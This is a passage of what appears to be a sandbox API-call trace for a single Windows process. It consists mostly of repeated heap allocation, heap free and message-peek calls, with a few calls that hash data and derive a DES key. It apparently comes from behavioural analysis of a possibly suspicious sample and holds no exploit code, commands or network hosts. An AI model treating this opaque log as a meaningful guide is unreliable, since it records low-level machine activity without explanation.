RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.306] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.306] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.306] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.307] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.307] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.309] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0188.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.310] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.310] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.310] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.310] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.310] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.311] CryptHashData (hHash=0xaa58e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.313] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.314] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0188.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 